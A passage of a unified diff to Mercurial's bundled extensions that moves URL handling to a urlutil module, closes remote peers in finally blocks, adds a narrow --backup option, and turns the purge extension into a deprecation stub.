import context # common @@ -151,9 +154,9 @@ def annotatepeer(repo): ui = repo.ui - remotepath = ui.expandpath( - ui.config(b'fastannotate', b'remotepath', b'default') - ) + remotedest = ui.config(b'fastannotate', b'remotepath', b'default') + r = urlutil.get_unique_pull_path(b'fastannotate', repo, ui, remotedest) + remotepath = r[0] peer = hg.peer(ui, {}, remotepath) try: diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -19,9 +19,11 @@ lock, pycompat, registrar, - util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) release = lock.release cmdtable = {} @@ -107,10 +109,9 @@ ) ) - other = hg.peer(repo, opts, ui.expandpath(source)) - ui.status( - _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source)) - ) + path = urlutil.get_unique_pull_path(b'fetch', repo, ui, source)[0] + other = hg.peer(repo, opts, path) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(path)) revs = None if opts[b'rev']: try: @@ -180,7 +181,7 @@ if not err: # we don't translate commit messages message = cmdutil.logmessage(ui, opts) or ( - b'Automated merge with %s' % util.removeauth(other.url()) + b'Automated merge with %s' % urlutil.removeauth(other.url()) ) editopt = opts.get(b'edit') or opts.get(b'force_editor') editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch') diff --git a/hgext/fix.py b/hgext/fix.py --- a/hgext/fix.py +++ b/hgext/fix.py @@ -131,8 +131,10 @@ import subprocess from mercurial.i18n import _ -from mercurial.node import nullrev -from mercurial.node import wdirrev +from mercurial.node import ( + nullrev, + wdirrev, +) from mercurial.utils import procutil @@ -433,8 +435,9 @@ if not (len(revs) == 1 and wdirrev in revs): cmdutil.checkunfinished(repo) rewriteutil.precheck(repo, revs, b'fix') - if wdirrev in revs and list( - mergestatemod.mergestate.read(repo).unresolved() + if ( + wdirrev in revs + and mergestatemod.mergestate.read(repo).unresolvedcount() ): 
raise error.Abort(b'unresolved conflicts', hint=b"use 'hg resolve'") if not revs: diff --git a/hgext/git/__init__.py b/hgext/git/__init__.py --- a/hgext/git/__init__.py +++ b/hgext/git/__init__.py @@ -90,7 +90,7 @@ return os.path.join(self.path, b'..', b'.hg', f) raise NotImplementedError(b'Need to pick file for %s.' % f) - def changelog(self, trypending): + def changelog(self, trypending, concurrencychecker): # TODO we don't have a plan for trypending in hg's git support yet return gitlog.changelog(self.git, self._db) diff --git a/hgext/git/gitlog.py b/hgext/git/gitlog.py --- a/hgext/git/gitlog.py +++ b/hgext/git/gitlog.py @@ -8,6 +8,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, wdirhex, ) from mercurial import ( @@ -217,7 +218,7 @@ n = nodeorrev # handle looking up nullid if n == nullid: - return hgchangelog._changelogrevision(extra={}) + return hgchangelog._changelogrevision(extra={}, manifest=nullid) hn = gitutil.togitnode(n) # We've got a real commit! files = [ @@ -422,6 +423,8 @@ class manifestlog(baselog): + nodeconstants = sha1nodeconstants + def __getitem__(self, node): return self.get(b'', node) diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -242,6 +242,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) pickle = util.pickle @@ -1040,11 +1041,12 @@ Used by initialization code""" if opts is None: opts = {} - dest = ui.expandpath(remote or b'default-push', remote or b'default') - dest, branches = hg.parseurl(dest, None)[:2] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote) + dest = path.pushloc or path.loc + + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) + + revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None) other = hg.peer(repo, opts, dest) if revs: @@ -1581,10 +1583,19 @@ def layout(mode): 
maxy, maxx = stdscr.getmaxyx() helplen = len(helplines(mode)) + mainlen = maxy - helplen - 12 + if mainlen < 1: + raise error.Abort( + _(b"terminal dimensions %d by %d too small for curses histedit") + % (maxy, maxx), + hint=_( + b"enlarge your terminal or use --config ui.interface=text" + ), + ) return { b'commit': (12, maxx), b'help': (helplen, maxx), - b'main': (maxy - helplen - 12, maxx), + b'main': (mainlen, maxx), } def drawvertwin(size, y, x): @@ -1614,63 +1625,60 @@ stdscr.clear() stdscr.refresh() while True: - try: - oldmode, _ = state[b'mode'] - if oldmode == MODE_INIT: - changemode(state, MODE_RULES) - e = event(state, ch) - - if e == E_QUIT: - return False - if e == E_HISTEDIT: - return state[b'rules'] + oldmode, unused = state[b'mode'] + if oldmode == MODE_INIT: + changemode(state, MODE_RULES) + e = event(state, ch) + + if e == E_QUIT: + return False + if e == E_HISTEDIT: + return state[b'rules'] + else: + if e == E_RESIZE: + size = screen_size() + if size != stdscr.getmaxyx(): + curses.resizeterm(*size) + + curmode, unused = state[b'mode'] + sizes = layout(curmode) + if curmode != oldmode: + state[b'page_height'] = sizes[b'main'][0] + # Adjust the view to fit the current screen size. + movecursor(state, state[b'pos'], state[b'pos']) + + # Pack the windows against the top, each pane spread across the + # full width of the screen. 
+ y, x = (0, 0) + helpwin, y, x = drawvertwin(sizes[b'help'], y, x) + mainwin, y, x = drawvertwin(sizes[b'main'], y, x) + commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) + + if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): + if e == E_PAGEDOWN: + changeview(state, +1, b'page') + elif e == E_PAGEUP: + changeview(state, -1, b'page') + elif e == E_LINEDOWN: + changeview(state, +1, b'line') + elif e == E_LINEUP: + changeview(state, -1, b'line') + + # start rendering + commitwin.erase() + helpwin.erase() + mainwin.erase() + if curmode == MODE_PATCH: + renderpatch(mainwin, state) + elif curmode == MODE_HELP: + renderstring(mainwin, state, __doc__.strip().splitlines()) else: - if e == E_RESIZE: - size = screen_size() - if size != stdscr.getmaxyx(): - curses.resizeterm(*size) - - curmode, _ = state[b'mode'] - sizes = layout(curmode) - if curmode != oldmode: - state[b'page_height'] = sizes[b'main'][0] - # Adjust the view to fit the current screen size. - movecursor(state, state[b'pos'], state[b'pos']) - - # Pack the windows against the top, each pane spread across the - # full width of the screen. 
- y, x = (0, 0) - helpwin, y, x = drawvertwin(sizes[b'help'], y, x) - mainwin, y, x = drawvertwin(sizes[b'main'], y, x) - commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) - - if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): - if e == E_PAGEDOWN: - changeview(state, +1, b'page') - elif e == E_PAGEUP: - changeview(state, -1, b'page') - elif e == E_LINEDOWN: - changeview(state, +1, b'line') - elif e == E_LINEUP: - changeview(state, -1, b'line') - - # start rendering - commitwin.erase() - helpwin.erase() - mainwin.erase() - if curmode == MODE_PATCH: - renderpatch(mainwin, state) - elif curmode == MODE_HELP: - renderstring(mainwin, state, __doc__.strip().splitlines()) - else: - renderrules(mainwin, state) - rendercommit(commitwin, state) - renderhelp(helpwin, state) - curses.doupdate() - # done rendering - ch = encoding.strtolocal(stdscr.getkey()) - except curses.error: - pass + renderrules(mainwin, state) + rendercommit(commitwin, state) + renderhelp(helpwin, state) + curses.doupdate() + # done rendering + ch = encoding.strtolocal(stdscr.getkey()) def _chistedit(ui, repo, freeargs, opts): diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -116,6 +116,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from mercurial import ( @@ -683,7 +684,13 @@ def _pull(orig, ui, repo, source=b"default", **opts): opts = pycompat.byteskwargs(opts) # Copy paste from `pull` command - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) + source, branches = urlutil.get_unique_pull_path( + b"infinite-push's pull", + repo, + ui, + source, + default_branches=opts.get(b'branch'), + ) scratchbookmarks = {} unfi = repo.unfiltered() @@ -704,16 +711,19 @@ if scratchbookmarks: other = hg.peer(repo, opts, source) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=scratchbookmarks - ) - for bookmark in scratchbookmarks: - if 
bookmark not in fetchedbookmarks: - raise error.Abort( - b'remote bookmark %s not found!' % bookmark - ) - scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] - revs.append(fetchedbookmarks[bookmark]) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=scratchbookmarks + ) + for bookmark in scratchbookmarks: + if bookmark not in fetchedbookmarks: + raise error.Abort( + b'remote bookmark %s not found!' % bookmark + ) + scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] + revs.append(fetchedbookmarks[bookmark]) + finally: + other.close() opts[b'bookmark'] = bookmarks opts[b'rev'] = revs @@ -805,7 +815,7 @@ return common, True, remoteheads -def _push(orig, ui, repo, dest=None, *args, **opts): +def _push(orig, ui, repo, *dests, **opts): opts = pycompat.byteskwargs(opts) bookmark = opts.get(b'bookmark') # we only support pushing one infinitepush bookmark at once @@ -833,25 +843,28 @@ oldphasemove = extensions.wrapfunction( exchange, b'_localphasemove', _phasemove ) - # Copy-paste from `push` command - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) + + paths = list(urlutil.get_push_paths(repo, ui, dests)) + if len(paths) > 1: + msg = _(b'cannot push to multiple path with infinitepush') + raise error.Abort(msg) + + path = paths[0] destpath = path.pushloc or path.loc # Remote scratch bookmarks will be deleted because remotenames doesn't # know about them. 
Let's save it before push and restore after remotescratchbookmarks = _readscratchremotebookmarks(ui, repo, destpath) - result = orig(ui, repo, dest, *args, **pycompat.strkwargs(opts)) + result = orig(ui, repo, *dests, **pycompat.strkwargs(opts)) if common.isremotebooksenabled(ui): if bookmark and scratchpush: other = hg.peer(repo, opts, destpath) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=[bookmark] - ) - remotescratchbookmarks.update(fetchedbookmarks) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=[bookmark] + ) + remotescratchbookmarks.update(fetchedbookmarks) + finally: + other.close() _saveremotebookmarks(repo, remotescratchbookmarks, destpath) if oldphasemove: exchange._localphasemove = oldphasemove diff --git a/hgext/largefiles/basestore.py b/hgext/largefiles/basestore.py --- a/hgext/largefiles/basestore.py +++ b/hgext/largefiles/basestore.py @@ -12,6 +12,9 @@ from mercurial.i18n import _ from mercurial import node, util +from mercurial.utils import ( + urlutil, +) from . 
import lfutil @@ -29,13 +32,13 @@ def longmessage(self): return _(b"error getting id %s from url %s for file %s: %s\n") % ( self.hash, - util.hidepassword(self.url), + urlutil.hidepassword(self.url), self.filename, self.detail, ) def __str__(self): - return b"%s: %s" % (util.hidepassword(self.url), self.detail) + return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail) class basestore(object): @@ -79,7 +82,7 @@ if not available.get(hash): ui.warn( _(b'%s: largefile %s not available from %s\n') - % (filename, hash, util.hidepassword(self.url)) + % (filename, hash, urlutil.hidepassword(self.url)) ) missing.append(filename) continue diff --git a/hgext/largefiles/lfutil.py b/hgext/largefiles/lfutil.py --- a/hgext/largefiles/lfutil.py +++ b/hgext/largefiles/lfutil.py @@ -206,6 +206,7 @@ repo.root, repo.dirstate._validate, lambda: sparse.matcher(repo), + repo.nodeconstants, ) # If the largefiles dirstate does not exist, populate and create @@ -513,7 +514,7 @@ def islfilesrepo(repo): '''Return true if the repo is a largefile repo.''' if b'largefiles' in repo.requirements and any( - shortnameslash in f[0] for f in repo.store.datafiles() + shortnameslash in f[1] for f in repo.store.datafiles() ): return True diff --git a/hgext/largefiles/overrides.py b/hgext/largefiles/overrides.py --- a/hgext/largefiles/overrides.py +++ b/hgext/largefiles/overrides.py @@ -1567,7 +1567,7 @@ # Calling purge with --all will cause the largefiles to be deleted. # Override repo.status to prevent this from happening. -@eh.wrapcommand(b'purge', extension=b'purge') +@eh.wrapcommand(b'purge') def overridepurge(orig, ui, repo, *dirs, **opts): # XXX Monkey patching a repoview will not work. 
The assigned attribute will # be set on the unfiltered repo, but we will only lookup attributes in the diff --git a/hgext/largefiles/remotestore.py b/hgext/largefiles/remotestore.py --- a/hgext/largefiles/remotestore.py +++ b/hgext/largefiles/remotestore.py @@ -15,7 +15,10 @@ util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from . import ( basestore, @@ -40,11 +43,11 @@ if self.sendfile(source, hash): raise error.Abort( _(b'remotestore: could not put %s to remote store %s') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) self.ui.debug( _(b'remotestore: put %s to remote store %s\n') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) def exists(self, hashes): @@ -80,7 +83,7 @@ # keep trying with the other files... they will probably # all fail too. raise error.Abort( - b'%s: %s' % (util.hidepassword(self.url), e.reason) + b'%s: %s' % (urlutil.hidepassword(self.url), e.reason) ) except IOError as e: raise basestore.StoreError( diff --git a/hgext/largefiles/reposetup.py b/hgext/largefiles/reposetup.py --- a/hgext/largefiles/reposetup.py +++ b/hgext/largefiles/reposetup.py @@ -445,7 +445,7 @@ def checkrequireslfiles(ui, repo, **kwargs): if b'largefiles' not in repo.requirements and any( - lfutil.shortname + b'/' in f[0] for f in repo.store.datafiles() + lfutil.shortname + b'/' in f[1] for f in repo.store.datafiles() ): repo.requirements.add(b'largefiles') scmutil.writereporequirements(repo) diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -12,6 +12,9 @@ hg, util, ) +from mercurial.utils import ( + urlutil, +) from . import ( lfutil, @@ -19,6 +22,7 @@ wirestore, ) + # During clone this function is passed the src's ui object # but it needs the dest's ui object so it can read out of # the config file. Use repo.ui instead. 
@@ -28,24 +32,27 @@ if not remote: lfpullsource = getattr(repo, 'lfpullsource', None) - if lfpullsource: - path = ui.expandpath(lfpullsource) - elif put: - path = ui.expandpath(b'default-push', b'default') + if put: + path = urlutil.get_unique_push_path( + b'lfpullsource', repo, ui, lfpullsource + ) else: - path = ui.expandpath(b'default') + path, _branches = urlutil.get_unique_pull_path( + b'lfpullsource', repo, ui, lfpullsource + ) - # ui.expandpath() leaves 'default-push' and 'default' alone if - # they cannot be expanded: fallback to the empty string, - # meaning the current directory. + # XXX we should not explicitly pass b'default', as this will result in + # b'default' being returned if no `paths.default` was defined. We + # should explicitely handle the lack of value instead. if repo is None: - path = ui.expandpath(b'default') - path, _branches = hg.parseurl(path) + path, _branches = urlutil.get_unique_pull_path( + b'lfs', repo, ui, b'default' + ) remote = hg.peer(repo or ui, {}, path) elif path == b'default-push' or path == b'default': remote = repo else: - path, _branches = hg.parseurl(path) + path, _branches = urlutil.parseurl(path) remote = hg.peer(repo or ui, {}, path) # The path could be a scheme so use Mercurial's normal functionality @@ -71,7 +78,7 @@ raise error.Abort( _(b'%s does not appear to be a largefile store') - % util.hidepassword(path) + % urlutil.hidepassword(path) ) diff --git a/hgext/lfs/blobstore.py b/hgext/lfs/blobstore.py --- a/hgext/lfs/blobstore.py +++ b/hgext/lfs/blobstore.py @@ -31,7 +31,10 @@ worker, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from ..largefiles import lfutil @@ -725,7 +728,7 @@ https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md """ lfsurl = repo.ui.config(b'lfs', b'url') - url = util.url(lfsurl or b'') + url = urlutil.url(lfsurl or b'') if lfsurl is None: if remote: path = remote @@ -739,7 +742,7 @@ # and fall back to inferring 
from 'paths.remote' if unspecified. path = repo.ui.config(b'paths', b'default') or b'' - defaulturl = util.url(path) + defaulturl = urlutil.url(path) # TODO: support local paths as well. # TODO: consider the ssh -> https transformation that git applies @@ -748,7 +751,7 @@ defaulturl.path += b'/' defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs' - url = util.url(bytes(defaulturl)) + url = urlutil.url(bytes(defaulturl)) repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url) scheme = url.scheme diff --git a/hgext/lfs/wrapper.py b/hgext/lfs/wrapper.py --- a/hgext/lfs/wrapper.py +++ b/hgext/lfs/wrapper.py @@ -116,10 +116,10 @@ if hgmeta or text.startswith(b'\1\n'): text = storageutil.packmeta(hgmeta, text) - return (text, True, {}) + return (text, True) -def writetostore(self, text, sidedata): +def writetostore(self, text): # hg filelog metadata (includes rename, etc) hgmeta, offset = storageutil.parsemeta(text) if offset and offset > 0: diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -108,6 +108,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) release = lockmod.release @@ -2509,7 +2510,7 @@ ) filename = normname(filename) self.checkreservedname(filename) - if util.url(filename).islocal(): + if urlutil.url(filename).islocal(): originpath = self.join(filename) if not os.path.isfile(originpath): raise error.Abort( @@ -2862,11 +2863,12 @@ # main repo (destination and sources) if dest is None: dest = hg.defaultdest(source) - sr = hg.peer(ui, opts, ui.expandpath(source)) + __, source_path, __ = urlutil.get_clone_path(ui, source) + sr = hg.peer(ui, opts, source_path) # patches repo (source only) if opts.get(b'patches'): - patchespath = ui.expandpath(opts.get(b'patches')) + __, patchespath, __ = urlutil.get_clone_path(ui, opts.get(b'patches')) else: patchespath = patchdir(sr) try: diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ 
b/hgext/narrow/narrowcommands.py @@ -36,6 +36,9 @@ util, wireprototypes, ) +from mercurial.utils import ( + urlutil, +) table = {} command = registrar.command(table) @@ -214,6 +217,7 @@ newincludes, newexcludes, force, + backup, ): oldmatch = narrowspec.match(repo.root, oldincludes, oldexcludes) newmatch = narrowspec.match(repo.root, newincludes, newexcludes) @@ -272,10 +276,10 @@ hg.clean(repo, urev) overrides = {(b'devel', b'strip-obsmarkers'): False} with ui.configoverride(overrides, b'narrow'): - repair.strip(ui, unfi, tostrip, topic=b'narrow') + repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup) todelete = [] - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if f.startswith(b'data/'): file = f[5:-2] if not newmatch(file): @@ -442,6 +446,12 @@ ), ( b'', + b'backup', + True, + _(b'back up local changes when narrowing'), + ), + ( + b'', b'update-working-copy', False, _(b'update working copy when the store has changed'), @@ -583,81 +593,88 @@ # Find the revisions we have in common with the remote. These will # be used for finding local-only changes for narrowing. They will # also define the set of revisions to update for widening. - remotepath = ui.expandpath(remotepath or b'default') - url, branches = hg.parseurl(remotepath) - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + r = urlutil.get_unique_pull_path(b'tracked', repo, ui, remotepath) + url, branches = r + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) - # check narrow support before doing anything if widening needs to be - # performed. In future we should also abort if client is ellipses and - # server does not support ellipses - if widening and wireprototypes.NARROWCAP not in remote.capabilities(): - raise error.Abort(_(b"server does not support narrow clones")) + try: + # check narrow support before doing anything if widening needs to be + # performed. 
In future we should also abort if client is ellipses and + # server does not support ellipses + if ( + widening + and wireprototypes.NARROWCAP not in remote.capabilities() + ): + raise error.Abort(_(b"server does not support narrow clones")) - commoninc = discovery.findcommonincoming(repo, remote) + commoninc = discovery.findcommonincoming(repo, remote) - if autoremoveincludes: - outgoing = discovery.findcommonoutgoing( - repo, remote, commoninc=commoninc - ) - ui.status(_(b'looking for unused includes to remove\n')) - localfiles = set() - for n in itertools.chain(outgoing.missing, outgoing.excluded): - localfiles.update(repo[n].files()) - suggestedremovals = [] - for include in sorted(oldincludes): - match = narrowspec.match(repo.root, [include], oldexcludes) - if not any(match(f) for f in localfiles): - suggestedremovals.append(include) - if suggestedremovals: - for s in suggestedremovals: - ui.status(b'%s\n' % s) - if ( - ui.promptchoice( - _( - b'remove these unused includes (yn)?' - b'$$ &Yes $$ &No' + if autoremoveincludes: + outgoing = discovery.findcommonoutgoing( + repo, remote, commoninc=commoninc + ) + ui.status(_(b'looking for unused includes to remove\n')) + localfiles = set() + for n in itertools.chain(outgoing.missing, outgoing.excluded): + localfiles.update(repo[n].files()) + suggestedremovals = [] + for include in sorted(oldincludes): + match = narrowspec.match(repo.root, [include], oldexcludes) + if not any(match(f) for f in localfiles): + suggestedremovals.append(include) + if suggestedremovals: + for s in suggestedremovals: + ui.status(b'%s\n' % s) + if ( + ui.promptchoice( + _( + b'remove these unused includes (yn)?' 
+ b'$$ &Yes $$ &No' + ) ) - ) - == 0 - ): - removedincludes.update(suggestedremovals) - narrowing = True - else: - ui.status(_(b'found no unused includes\n')) + == 0 + ): + removedincludes.update(suggestedremovals) + narrowing = True + else: + ui.status(_(b'found no unused includes\n')) - if narrowing: - newincludes = oldincludes - removedincludes - newexcludes = oldexcludes | addedexcludes - _narrow( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - opts[b'force_delete_local_changes'], - ) - # _narrow() updated the narrowspec and _widen() below needs to - # use the updated values as its base (otherwise removed includes - # and addedexcludes will be lost in the resulting narrowspec) - oldincludes = newincludes - oldexcludes = newexcludes + if narrowing: + newincludes = oldincludes - removedincludes + newexcludes = oldexcludes | addedexcludes + _narrow( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + opts[b'force_delete_local_changes'], + opts[b'backup'], + ) + # _narrow() updated the narrowspec and _widen() below needs to + # use the updated values as its base (otherwise removed includes + # and addedexcludes will be lost in the resulting narrowspec) + oldincludes = newincludes + oldexcludes = newexcludes - if widening: - newincludes = oldincludes | addedincludes - newexcludes = oldexcludes - removedexcludes - _widen( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - ) + if widening: + newincludes = oldincludes | addedincludes + newexcludes = oldexcludes - removedexcludes + _widen( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + ) + finally: + remote.close() return 0 diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -1,6 +1,6 @@ # patchbomb.py - sending Mercurial changesets as patch emails # -# Copyright 2005-2009 
Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -99,7 +99,10 @@ templater, util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) stringio = util.stringio @@ -379,7 +382,10 @@ if btype: opts['type'] = btype try: - commands.bundle(ui, repo, tmpfn, dest, **opts) + dests = [] + if dest: + dests = [dest] + commands.bundle(ui, repo, tmpfn, *dests, **opts) return util.readfile(tmpfn) finally: try: @@ -527,9 +533,9 @@ def _getoutgoing(repo, dest, revs): '''Return the revisions present locally but not in dest''' ui = repo.ui - url = ui.expandpath(dest or b'default-push', dest or b'default') - url = hg.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + paths = urlutil.get_push_paths(repo, ui, [dest]) + safe_paths = [urlutil.hidepassword(p.rawloc) for p in paths] + ui.status(_(b'comparing with %s\n') % b','.join(safe_paths)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/hgext/phabricator.py b/hgext/phabricator.py --- a/hgext/phabricator.py +++ b/hgext/phabricator.py @@ -103,6 +103,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from . 
import show @@ -366,7 +367,7 @@ process(k, v) process(b'', params) - return util.urlreq.urlencode(flatparams) + return urlutil.urlreq.urlencode(flatparams) def readurltoken(ui): @@ -381,7 +382,7 @@ _(b'config %s.%s is required') % (b'phabricator', b'url') ) - res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user) + res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user) token = None if res: diff --git a/hgext/purge.py b/hgext/purge.py --- a/hgext/purge.py +++ b/hgext/purge.py @@ -22,115 +22,11 @@ # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. -'''command to delete untracked files from the working directory''' -from __future__ import absolute_import - -from mercurial.i18n import _ -from mercurial import ( - cmdutil, - merge as mergemod, - pycompat, - registrar, - scmutil, -) - -cmdtable = {} -command = registrar.command(cmdtable) -# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for -# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should -# be specifying the version(s) of Mercurial they are tested with, or -# leave the attribute unspecified. -testedwith = b'ships-with-hg-core' - - -@command( - b'purge|clean', - [ - (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), - (b'', b'all', None, _(b'purge ignored files too')), - (b'i', b'ignored', None, _(b'purge only ignored files')), - (b'', b'dirs', None, _(b'purge empty directories')), - (b'', b'files', None, _(b'purge files')), - (b'p', b'print', None, _(b'print filenames instead of deleting them')), - ( - b'0', - b'print0', - None, - _( - b'end filenames with NUL, for use with xargs' - b' (implies -p/--print)' - ), - ), - ] - + cmdutil.walkopts, - _(b'hg purge [OPTION]... 
[DIR]...'), - helpcategory=command.CATEGORY_WORKING_DIRECTORY, -) -def purge(ui, repo, *dirs, **opts): - """removes files not tracked by Mercurial - - Delete files not known to Mercurial. This is useful to test local - and uncommitted changes in an otherwise-clean source tree. - - This means that purge will delete the following by default: - - - Unknown files: files marked with "?" by :hg:`status` - - Empty directories: in fact Mercurial ignores directories unless - they contain files under source control management +'''command to delete untracked files from the working directory (DEPRECATED) - But it will leave untouched: - - - Modified and unmodified tracked files - - Ignored files (unless -i or --all is specified) - - New files added to the repository (with :hg:`add`) - - The --files and --dirs options can be used to direct purge to delete - only files, only directories, or both. If neither option is given, - both will be deleted. - - If directories are given on the command line, only files in these - directories are considered. - - Be careful with purge, as you could irreversibly delete some files - you forgot to add to the repository. If you only want to print the - list of files that this program would delete, use the --print - option. - """ - opts = pycompat.byteskwargs(opts) - cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') +The functionality of this extension has been included in core Mercurial since +version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now the default, unless the extension is enabled for backward compatibility. 
+''' - act = not opts.get(b'print') - eol = b'\n' - if opts.get(b'print0'): - eol = b'\0' - act = False # --print0 implies --print - if opts.get(b'all', False): - ignored = True - unknown = True - else: - ignored = opts.get(b'ignored', False) - unknown = not ignored - - removefiles = opts.get(b'files') - removedirs = opts.get(b'dirs') - - if not removefiles and not removedirs: - removefiles = True - removedirs = True - - match = scmutil.match(repo[None], dirs, opts) - - paths = mergemod.purge( - repo, - match, - unknown=unknown, - ignored=ignored, - removeemptydirs=removedirs, - removefiles=removefiles, - abortonerror=opts.get(b'abort_on_err'), - noop=not act, - ) - - for path in paths: - if not act: - ui.write(b'%s%s' % (path, eol)) +# This empty extension looks pointless, but core mercurial checks if it's loaded +# to implement the slightly different behavior documented above. diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -67,6 +67,14 @@ cmdtable = {} command = registrar.command(cmdtable) + +configtable = {} +configitem = registrar.configitem(configtable) +configitem( + b'devel', + b'rebase.force-in-memory-merge', + default=False, +) # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for # extensions which SHIP WITH MERCURIAL. 
Non-mainline extensions should # be specifying the version(s) of Mercurial they are tested with, or @@ -136,7 +144,7 @@ return smartset.baseset() dests = destutil.orphanpossibledestination(repo, src) if len(dests) > 1: - raise error.Abort( + raise error.StateError( _(b"ambiguous automatic rebase: %r could end up on any of %r") % (src, dests) ) @@ -197,8 +205,8 @@ self.skipemptysuccessorf = rewriteutil.skip_empty_successor( repo.ui, b'rebase' ) - self.obsoletenotrebased = {} - self.obsoletewithoutsuccessorindestination = set() + self.obsolete_with_successor_in_destination = {} + self.obsolete_with_successor_in_rebase_set = set() self.inmemory = inmemory self.dryrun = dryrun self.stateobj = statemod.cmdstate(repo, b'rebasestate') @@ -340,25 +348,33 @@ return data - def _handleskippingobsolete(self, obsoleterevs, destmap): - """Compute structures necessary for skipping obsolete revisions - - obsoleterevs: iterable of all obsolete revisions in rebaseset - destmap: {srcrev: destrev} destination revisions - """ - self.obsoletenotrebased = {} + def _handleskippingobsolete(self): + """Compute structures necessary for skipping obsolete revisions""" + if self.keepf: + return if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return - obsoleteset = set(obsoleterevs) + obsoleteset = {r for r in self.state if self.repo[r].obsolete()} ( - self.obsoletenotrebased, - self.obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, - ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap) - skippedset = set(self.obsoletenotrebased) - skippedset.update(self.obsoletewithoutsuccessorindestination) - skippedset.update(obsoleteextinctsuccessors) + self.obsolete_with_successor_in_destination, + self.obsolete_with_successor_in_rebase_set, + ) = _compute_obsolete_sets(self.repo, obsoleteset, self.destmap) + skippedset = set(self.obsolete_with_successor_in_destination) + skippedset.update(self.obsolete_with_successor_in_rebase_set) _checkobsrebase(self.repo, 
